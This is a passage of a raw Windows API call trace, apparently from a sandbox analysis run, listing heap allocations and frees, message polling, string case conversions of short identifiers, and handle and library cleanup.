lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.425] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.425] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.425] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.426] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.426] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.426] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.426] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.426] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.426] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.426] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.426] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.426] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.427] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.427] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.427] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.427] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.427] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.427] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.427] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.427] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.427] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.427] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.427] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.427] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.427] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.427] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.427] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.428] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.428] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.428] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.428] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.428] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.428] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.428] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.428] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.428] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.428] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.428] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.429] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.430] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.430] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.431] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.431] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.431] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.431] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.432] FreeLibrary (hLibModule=0x74d40000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.432] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.432] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.433] CloseHandle (hObject=0x268) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0207.436] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0207.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0207.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0207.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0207.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0207.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0207.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.438] CloseHandle (hObject=0x1f8) returned 1 [0207.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0207.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0207.460] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.461] 